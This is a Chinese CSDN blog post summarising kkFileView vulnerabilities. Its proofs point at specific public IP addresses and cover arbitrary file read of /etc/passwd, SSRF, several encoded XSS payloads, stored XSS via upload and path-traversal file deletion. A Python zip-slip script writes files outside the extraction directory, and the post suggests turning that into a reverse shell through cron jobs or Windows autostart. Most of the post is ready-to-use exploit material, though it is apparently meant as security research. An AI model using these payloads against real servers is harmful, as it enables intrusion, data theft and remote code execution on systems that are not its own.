kkFileview漏洞总结

已于 2024-07-22 14:36:34 修改
阅读量1k 收藏 13
点赞数 23
分类专栏: 漏洞 文章标签: web安全
于 2024-07-22 14:23:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61475980/article/details/140604251
版权

项目介绍

Keking KkFileview是中国凯京科技(Keking)公司的一个以Spring Boot打造文件文档在线预览项目

1-任意文件读取漏洞

影响版本

kkFileview <=3.6.0

漏洞证明

http://103.39.221.102:8012//getCorsFile?urlPath=file:///etc/passwd

2-SSRF漏洞

影响版本

kkFileview =v4.1.0

漏洞证明

http://121.40.238.48:8012//getCorsFile?urlPath=aHR0cDovL2QyYjY0NWQ3LmRucy5kbnNtYXAub3Jn

3-XSS漏洞

漏洞影响

kkFileview =v4.1.0

漏洞证明

http://139.9.164.127:8012/onlinePreview?url=%3Cimg%20src=x%20οnerrοr=alert(0)%3E

http://www.baidu.com/test.txt"><img src=111 οnerrοr=alert(1)>
编码base64:
aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg==
url编码:aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D

http://119.91.146.127:8012/picturesPreview?urls=aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D

<svg/οnlοad=alert(1)>
编码base64:
PHN2Zy9vbmxvYWQ9YWxlcnQoMSk+
url编码:
PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B

http://119.91.146.127:8012/picturesPreview?urls=&currentUrl=PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B

4-任意文件上传导致存储xss

漏洞影响

kkFileView=4.1.0

漏洞证明

访问上传的文件
http://139.9.101.60:8012/demo/2.html

5-任意文件删除

漏洞影响

kkFileview= v4.0.0

漏洞证明

/deleteFile?fileName=demo%2F..\xss.pdf
get请求此uri会删除\kkFileView-master\server\src\main\file目录中的xss.pdf(原本只能删除\kkFileView-master\server\src\main\file\demo目录下的文件)

6.任意文件上传导致远程执行漏洞

漏洞影响

4.2.0-4.4.0

漏洞证明 

制作恶意hack.zip,注意里面必须有一个正常文件,例如test,便于创建hack.zip_缓存文件

这个poc的含义是在指定文件/AAA/flag中写入test_Yu9

import zipfile

if __name__ == "__main__":
    try:
        binary1 = b'test'
        binary2 = b'test_Yu9'
        zipFile = zipfile.ZipFile("hack.zip", "a", zipfile.ZIP_DEFLATED)
        info = zipfile.ZipInfo("hack.zip")
        zipFile.writestr("test", binary1)
        zipFile.writestr("../../../../../../../../../../../../../../../../../../../AAA/flag", binary2)
        zipFile.close()
    except IOError as e:
        raise e

上传压缩包并点击预览

  • 在linux下且高权限的情况下,可以通过写入计划任务反弹shell。
  • 在windows下高权下可以通过写自启动 的方式getshell。

参考

kkFileView漏洞总结(转) - 小白不太黑 - 博客园 (cnblogs.com)

kkFileView 4.2.0-4.4.0 任意文件上传导致远程执行漏洞分析 - 先知社区 (aliyun.com)

『 』785
关注
  • 23
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
kkFileView 任意文件上传致远程代码执行漏洞复现(QVD-2024-14703)
0xSec
04-21 1992
2024年4月,互联网上披露kkFileView远程代码执行漏洞情报,攻击者可利用该漏洞上传恶意文件,获取操作系统权限。该漏洞利用简单,建议受影响的客户尽快修复漏洞
kkFileView-4.0.0.tar
07-21
kkFileView-4.0.0:Linux平台上的全能文件预览工具》 kkFileView-4.0.0是一款专为Linux操作系统设计的高效、便捷的文件预览工具,其主要功能在于提供对多种文件类型的快速查看,无需通过复杂的软件安装过程,极大...
网络安全-kkFileViews任意文件读取漏洞原理解析
weixin_39445116的博客
02-04 2558
在学习的过程中,了解到kkFileView存在任意文件读取、SSRF、文件上传漏洞。为了更深刻的理解其原理,我从git拉取了项目,由于该漏洞在最新版本已经修复,所以这只是历史版本中存在的。写这篇文章来提醒自己代码中容易出问题的地方。
KKFileView v3.5.1文件预览服务漏洞修复
fengshi95的博客
05-23 484
KKFileView演示首页,提供了文件上传的功能,可以上传任意文件。
kkFileView漏洞总结
Websec
03-18 2917
Keking kkFileview 存在安全漏洞,该漏洞源于存在通过目录遍历漏洞读取任意文件,可能导致相关主机上的敏感文件泄漏。kkFileview v4.1.0存在SSRF漏洞,攻击者可以利用此漏洞造成服务器端请求伪造(SSRF),远程攻击者可以通过将任意url注入url参数来强制应用程序发出任意请求,从而获取内网机器的数据。3、kkFileview的onlinePreview接口也存在SSRF漏洞,但是利用条件上稍微有点区别,这个接口限制了后缀只能为一些常见的文本类型。
漏洞分析 | kkFileView远程代码执行漏洞
WangsuSecurity的博客
05-17 1429
网宿安全演武实验室监测到kkFileView存在远程代码执行漏洞(网宿评分:危急,CVSS3.1评分:9.8)
kkFileView远程代码执行漏洞分析
qq_18193739的博客
04-23 1914
使用…/…/ 即可导致任意文件内容覆盖转换pdf是启动了LibreOffile 并执行 C:\Users\26927\Downloads\kkFileView-4.2.1\server\libreoffice\program\uno.py 脚本中内容导致RCE。
kkFileview存在任意文件读取漏洞
nnn2188185的博客
04-26 7994
Keking kkFileview 存在安全漏洞,该漏洞源于存在通过目录遍历漏洞读取任意文件,可能导致相关主机上的敏感文件泄漏。
kkfileview预览依赖libreoffice
02-14
kkfileview与libreoffice的紧密协作》 在信息技术领域,文件预览是一项不可或缺的功能,它使得用户无需打开文件就能快速浏览文件内容,极大地提高了工作效率。kkfileview作为一个高效、便捷的文件预览工具,其...
windows版本kkFileView
最新发布
07-31
java -Dfile.encoding=UTF-8 -Dspring.config.location=..\config\application.properties -jar kkFileView-4.3.0.jar -> ..\log\kkFileView.log 即可解决乱码问题 启动后在网页查看:http://127.0.0.1:8012
kkFileView在线预览-其他
06-12
kkFileView是一款使用spring boot打造的文件文档在线预览项目解决方案,支持doc、docx、ppt、pptx、xls、xlsx、zip、rar、mp4、mp3以及众多类文本如txt、html、xml、java、properties、sql、js、md、json、conf、ini...
kkFileView在线预览插件(支持主流办公文档的doc,docx,Excel,pdf,txt,zip,rar,图片在线预览)
02-02
1、支持windows、linux、centos主流平台; 2、插件开箱即用,直接运行startup.bat; 3、只需基础的jdk8 4、附测试用例
kkFileView-3.5.1.tar.gz
05-17
一个在线文件预览的工具,官网没有直接下载的,只有下载后需要自己编译的,这个是编译过的
kkfileview文件预览依赖
02-14
kkfileview文件预览依赖
kkFileView任意读取漏洞思考
qq_82303224_的博客
04-26 3436
urlPath=file:///etc/passwd //突破限制目录。urlPath=file:///etc/passwd直接可以读文件和。urlPath=file:///etc/passwd 成功读取到内容,urlPath=file:///etc/passwd 提示限制目录预览。.思路7:..|/..|/..|/..|/..|/..|/..|/..|etc/passwd。file:///etc/passwd 也是 500。
kkfileview阿里云安全扫描:威胁类型敏感信息回显 (Sensitive Information Response)
weixin_43866043的博客
03-30 1908
kkfileview
kkFileview任意文件读取漏洞复现
qq_44484541的博客
11-01 1791
kkFileView为文件文档在线预览解决方案,该项目使用流行的spring boot搭建,易上手和部署,基本支持主流办公文档的在线预览,如doc,docx,xls,xlsx,ppt,pptx,pdf,txt,zip,rar,图片,视频,音频等等。Keking kkFileview 存在安全漏洞,该漏洞源于存在通过目录遍历漏洞读取任意文件,可能导致相关主机上的敏感文件泄漏。Keking KkFileview是中国凯京科技(Keking)公司的一个 Spring-Boot 打造文件文档在线预览项目。
kkFileView 填坑记录
qq187363147的专栏
04-22 4033
系统使用es,canal,kkFileView等第三方软件,一开始全部使用docker镜像部署,一开始部署很快,用着用着服务器磁盘经常开始bps读写满,定位了好久也无法处理问,无奈之下只能换回原生安装方式。 1.回主题,去kkFileView官网下载发布版本,maven打包,得到kkFileView-3.5.1.jar 2.安装openoffice环境支持,服务器使用的是阿里云centos7,执行install.sh,脚本如下 安装完openoffice后,启动 # /op...
kkFileView任意读取漏洞
09-19
kkFileView存在任意文件读取漏洞,该漏洞源于存在通过目录遍历漏洞读取任意文件,可能导致相关主机上的敏感文件泄漏。该漏洞可以通过构造特定的数据包来触发,攻击者可以通过利用此漏洞来获取系统上的敏感文件信息。 补丁获取链接:https://github.com/kekingcn/kkFileView/issues/304
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值